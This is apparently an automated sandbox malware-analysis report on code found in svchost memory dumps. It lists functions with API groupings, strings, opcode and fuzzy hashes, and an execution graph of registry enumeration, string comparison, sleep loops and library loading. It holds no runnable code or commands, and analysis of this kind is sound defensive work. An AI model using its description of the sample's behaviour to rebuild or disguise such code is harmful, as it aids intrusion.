                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                          • Instruction ID: e348f4b8ca2f2e43a8a838488a3e225e290098b78fafa598df3c83bf27c7c81d
                                                          • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                          • Instruction Fuzzy Hash: B102CA32619B848AE760CB95F49835FB7A1F3C5794F104026EA8E87BA9DF7CC494CB10
                                                          Function 000002062E995710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                          • Instruction ID: 7a8efbf527f3287409eb5bf35087a85d3e500b226cc4267a2a968fdcf1a75b56
                                                          • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                          • Instruction Fuzzy Hash: B261A976919B44CEE760CB96E44C31A77A0F388784F50412AEE8D47BAADB7CC5A0CF10
                                                          Function 000002062E9A4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: _set_statfp
                                                          • String ID:
                                                          • API String ID: 1156100317-0
                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction ID: 5210fbe4db2a5961e03266c3474a2788818821884b5ef5c0b93f3e6cc0cd697a
                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction Fuzzy Hash: 9511C232ED0F5069F66455E8E85E3A911806F7B3B8F480A36AD76077E7CB28C8F14203
                                                          Function 000002062E973504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2612748111.000002062E960000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E960000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e960000_svchost.jbxd
                                                          Similarity
                                                          • API ID: _set_statfp
                                                          • String ID:
                                                          • API String ID: 1156100317-0
                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction ID: a4ba477c6b568d89aad1a67eb7c4b4ee1ac9343c44dd52f23f02f0f972dfa9a8
                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction Fuzzy Hash: C111A3A3EF0B1159FA6495E8E44E3AD11816B98374F48873AAD6E0E6D7CA24C8ED4204
                                                          Function 000002062E96F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2612748111.000002062E960000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E960000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e960000_svchost.jbxd
                                                          Similarity
                                                          • API ID: _invalid_parameter_noinfo
                                                          • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                          • API String ID: 3215553584-4202648911
                                                          • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                          • Instruction ID: 845a73dd7a0d16a4f89ae120fe61f48040246f15d744f59cbd136b54ef167c66
                                                          • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                          • Instruction Fuzzy Hash: 4F61D2B2E003428EFA69CFE6E54C36A26A0E781780F514437DE1A077A7DB34C8E5C680
                                                          Function 000002062E99AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CallEncodePointerTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3544855599-2084237596
                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                          • Instruction ID: 3f8bf77b0b0678fa3dfc591af396a2a7fa5d040fd02f85d60ed33998cf5f79f3
                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                          • Instruction Fuzzy Hash: 48617D33A01B848EEB20DFA5D44839D77B1F358B88F048226EF4917B9ADB78D5A5C700
                                                          Function 000002062E99AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                          • Instruction ID: 7909f6b301ab44e0809b9f8f1c3cbdddd6c6a33b40acdf3a06dfc3d3b86375d8
                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                          • Instruction Fuzzy Hash: 35516B729003808EEF648BA6958C36977A0F355B95F18D227DE9947B96CBB8D4F1CB00
                                                          Function 000002062E96A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2612748111.000002062E960000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E960000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e960000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                          • Instruction ID: 29b3c3f7b51f04bb02efd6cbea82ed5d346e0fb56aa0e7b2092e5018019cddfc
                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                          • Instruction Fuzzy Hash: BE516D32900382CEEF748F95954C75977A0F355B98F184127DE9987B96CBB9D4E0CB80
                                                          Function 000002062E968405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2612748111.000002062E960000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E960000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e960000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: csm$f
                                                          • API String ID: 3242871069-629598281
                                                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                          • Instruction ID: f48789a1a7be0f730c00a7c162d5310174d3f4303c8211792d7bd5cc62ee0d66
                                                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                          • Instruction Fuzzy Hash: B251AA72A123028EEB64CBA5E44CB1D3799F354B98F548177DE064778AEB34C8E1CB84
                                                          Function 000002062E9683E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2612748111.000002062E960000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E960000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e960000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: csm$f
                                                          • API String ID: 3242871069-629598281
                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                          • Instruction ID: 5eb98390c3130f7400e47ed0e6dab0a4168916cceed034cd68677d70d2b64be7
                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                          • Instruction Fuzzy Hash: 3431BF72A117419AE764DF51E84C71D77A4F344BC8F458027EE5A07786DB38C9A0CB84
                                                          Function 000002062E9A2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                          • String ID:
                                                          • API String ID: 2718003287-0
                                                          • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                          • Instruction ID: c94a7a651c41098b89189a612649f6c3cf8e893e1cbac12cda4c0b4092eadc20
                                                          • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                          • Instruction Fuzzy Hash: 3DD1D272F14B808DE711CFA9D4483AC3BB1FB54798F248226DE5D97B9ADA34C4A6C341
                                                          Function 000002062E9914A4 Relevance: 6.3, APIs: 5, Instructions: 39memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Free
                                                          • String ID:
                                                          • API String ID: 3168794593-0
                                                          • Opcode ID: 23e5596e6afe4154b2baf6c6de4ac956f245c11af45a2c6a236834124d1c642c
                                                          • Instruction ID: 2730c1459e68289c4abc1558d72ca114765fb6fc59b7bb858454c26ead6fdef3
                                                          • Opcode Fuzzy Hash: 23e5596e6afe4154b2baf6c6de4ac956f245c11af45a2c6a236834124d1c642c
                                                          • Instruction Fuzzy Hash: 12012D36E40B90DAE704DBA6E90C1497BA0FB48B81F044436DE5A43717DE34C0A18741
                                                          Function 000002062E9A2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ConsoleErrorLastMode
                                                          • String ID:
                                                          • API String ID: 953036326-0
                                                          • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                          • Instruction ID: e25273a9454475457d90bddbff835ea17a35dccfd3d49a2e38ff355fe5e5b1db
                                                          • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                          • Instruction Fuzzy Hash: 9391A062E507508EF7609FA5948C3AD3BA4BB45B88F24412BDE0E57B86DA34C4E2C702
                                                          Function 000002062E997960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                          • String ID:
                                                          • API String ID: 2933794660-0
                                                          • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                          • Instruction ID: 436b510292d060d5757dec32cced4bcbbca1c9905c387a005ecf698e310dbfe1
                                                          • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                          • Instruction Fuzzy Hash: 11112E22F54F018DEB00CFA1E8593A833A4F759758F440E36EE6D467A6DF78D1A88380
                                                          Function 000002062E99253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                          • Instruction ID: eade0dc12f7c25782718706822678bec37ae9f5683bc093bbfe64708483f8a09
                                                          • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                          • Instruction Fuzzy Hash: 3171B336A007818EE775DFA6A84C3EA6794F389B84F448037DD0D63B8ADE35D695C740
                                                          Function 000002062E969E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2612748111.000002062E960000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E960000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e960000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CallTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3163161869-2084237596
                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                          • Instruction ID: e5fb8fbff86d0cf1a0eef70bca3ab2b46fa5c3130f35fc819e1769da4a875ded
                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                          • Instruction Fuzzy Hash: C5617B73A00B858EEB25DFA5D44839D77A0F344B88F044227EF4917B9ADB78D5A5C780
                                                          Function 000002062E992330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                          • Instruction ID: 842cdc10443531308171600f52154286037ba96819756713604f5e6c1a7ff391
                                                          • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                          • Instruction Fuzzy Hash: 6B51E132A043818DE774DEAAB05C3AE6791F385780F458137DE5D03B8BEA39C9E48780
                                                          Function 000002062E9A26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: U
                                                          • API String ID: 442123175-4171548499
                                                          • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                          • Instruction ID: 5b1cda93a89c1a34e0c66b312931fe0a674ca8fd36126e0cc7ec51539c390dcc
                                                          • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                          • Instruction Fuzzy Hash: 0341B372B15B808ADB60CFA5E84C3A9B7A0F798794F504032EE4D87795EB3CC591C741
                                                          Function 000002062E9994A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFileHeaderRaise
                                                          • String ID: csm
                                                          • API String ID: 2573137834-1018135373
                                                          • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                          • Instruction ID: 8b6f07c477fdac16fcd564ed06e76a1441b90c903cd8674f9407545a263d9ab4
                                                          • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                          • Instruction Fuzzy Hash: EB114F36A14B808AEB618F15F44835A77E5FB88B94F588225EF8C0775ADF3CC5A1CB00
                                                          Function 000002062E967356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2612748111.000002062E960000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E960000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e960000_svchost.jbxd
                                                          Similarity
                                                          • API ID: __std_exception_copy
                                                          • String ID: ierarchy Descriptor'$riptor at (
                                                          • API String ID: 592178966-758928094
                                                          • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                          • Instruction ID: 57300292de7525897117fb4eebb19e904b818b34653099858772ae177271355a
                                                          • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                          • Instruction Fuzzy Hash: BEE086A1A40B4594EF018F61E84829873A0DB58B64B8891339D5C4A352FA38D5FDC300
                                                          Function 000002062E9673B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2612748111.000002062E960000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E960000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e960000_svchost.jbxd
                                                          Similarity
                                                          • API ID: __std_exception_copy
                                                          • String ID: Locator'$riptor at (
                                                          • API String ID: 592178966-4215709766
                                                          • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                          • Instruction ID: 2fda1b0e91116f33c1db9d604805274f6b52e800a18fca6b4bdf039ba0e4fa2f
                                                          • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                          • Instruction Fuzzy Hash: 4BE086A1A40B4484DF018F61D44819873A0E758B54BC89133CD4C4A312EA38D5F9C300
                                                          Function 000002062E991BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID:
                                                          • API String ID: 756756679-0
                                                          • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                          • Instruction ID: 3738e1032587d7959b75ad8d38e03ac9dbc3cb57300aa48f136f062b4353870e
                                                          • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                          • Instruction Fuzzy Hash: 3E114F25E01B5489EA54DFA7A40C22977A1FB89FC0F19803ADE4D57767EF38C4A2C710
                                                          Function 000002062E991268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                          • Instruction ID: 92a7ddcf066d628f501b5d67e96a4c4c5247d8b638e0c8975553f34a91f391a8
                                                          • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                          • Instruction Fuzzy Hash: 6EE03939E417048AEB048BA2D80C34A3EE1EB89B06F0480248D0907352DF7D84E9C751

                                                          Execution Graph

                                                          Execution Coverage:0.7%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:66
                                                          Total number of Limit Nodes:2
                                                          execution_graph 14784 282b8da1abc 14789 282b8da1628 GetProcessHeap HeapAlloc 14784->14789 14786 282b8da1ad2 Sleep SleepEx 14787 282b8da1acb 14786->14787 14787->14786 14788 282b8da1598 StrCmpIW StrCmpW 14787->14788 14788->14787 14833 282b8da1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14789->14833 14791 282b8da1650 14834 282b8da1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14791->14834 14793 282b8da1661 14835 282b8da1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14793->14835 14795 282b8da166a 14836 282b8da1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14795->14836 14797 282b8da1673 14798 282b8da168e RegOpenKeyExW 14797->14798 14799 282b8da16c0 RegOpenKeyExW 14798->14799 14800 282b8da18a6 14798->14800 14801 282b8da16ff RegOpenKeyExW 14799->14801 14802 282b8da16e9 14799->14802 14800->14787 14804 282b8da173a RegOpenKeyExW 14801->14804 14805 282b8da1723 14801->14805 14837 282b8da12bc RegQueryInfoKeyW 14802->14837 14808 282b8da175e 14804->14808 14809 282b8da1775 RegOpenKeyExW 14804->14809 14846 282b8da104c RegQueryInfoKeyW 14805->14846 14811 282b8da12bc 16 API calls 14808->14811 14812 282b8da17b0 RegOpenKeyExW 14809->14812 14813 282b8da1799 14809->14813 14817 282b8da176b RegCloseKey 14811->14817 14815 282b8da17eb RegOpenKeyExW 14812->14815 14816 282b8da17d4 14812->14816 14814 282b8da12bc 16 API calls 14813->14814 14818 282b8da17a6 RegCloseKey 14814->14818 14820 282b8da180f 14815->14820 14821 282b8da1826 RegOpenKeyExW 14815->14821 14819 282b8da12bc 16 API calls 14816->14819 14817->14809 14818->14812 14822 282b8da17e1 RegCloseKey 14819->14822 14823 282b8da104c 6 API calls 14820->14823 14824 282b8da184a 14821->14824 14825 282b8da1861 RegOpenKeyExW 14821->14825 14822->14815 14826 282b8da181c RegCloseKey 14823->14826 14827 282b8da104c 6 API calls 14824->14827 14828 282b8da189c RegCloseKey 14825->14828 14829 282b8da1885 14825->14829 14826->14821 14831 282b8da1857 RegCloseKey 14827->14831 14828->14800 14830 282b8da104c 6 API calls 14829->14830 14832 282b8da1892 RegCloseKey 14830->14832 14831->14825 14832->14828 14833->14791 14834->14793 14835->14795 14836->14797 14838 282b8da148a RegCloseKey 14837->14838 14839 282b8da1327 GetProcessHeap HeapAlloc 14837->14839 14838->14801 14840 282b8da1352 RegEnumValueW 14839->14840 14841 282b8da1476 GetProcessHeap HeapFree 14839->14841 14842 282b8da13a5 14840->14842 14841->14838 14842->14840 14842->14841 14844 282b8da141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 14842->14844 14845 282b8da13d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14842->14845 14851 282b8da152c 14842->14851 14844->14842 14845->14844 14847 282b8da11b5 RegCloseKey 14846->14847 14849 282b8da10bf 14846->14849 14847->14804 14848 282b8da10cf RegEnumValueW 14848->14849 14849->14847 14849->14848 14850 282b8da114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14849->14850 14850->14849 14852 282b8da157c 14851->14852 14855 282b8da1546 14851->14855 14852->14842 14853 282b8da155d StrCmpIW 14853->14855 14854 282b8da1565 StrCmpW 14854->14855 14855->14852 14855->14853 14855->14854 14856 282b8d7273c 14857 282b8d7276a 14856->14857 14858 282b8d72858 LoadLibraryA 14857->14858 14859 282b8d728d4 14857->14859 14858->14857

                                                          Executed Functions

                                                          Function 00000282B8DA1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                          • Instruction ID: 1838258d2a4ea62e11d2020910859a9a9350239f4fea5b24193432dfc46ba69e
                                                          • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                          • Instruction Fuzzy Hash: 3AE03939603645C6EB048BA2E80834A37E1EB89B8AF04C0248A0907751DF7D8499C750
                                                          Function 00000282B8DA328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                          • String ID:
                                                          • API String ID: 1683269324-0
                                                          • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                          • Instruction ID: 671e8030a51465004e8b63938ac407ede1e720a22efb3a90fb252c8c9a15e630
                                                          • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                          • Instruction Fuzzy Hash: 2A11F53861B683C2FB68A771A80D7592395A76438CF64812B9B2E41991EF78C04C8740
                                                          Function 00000282B8DA1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
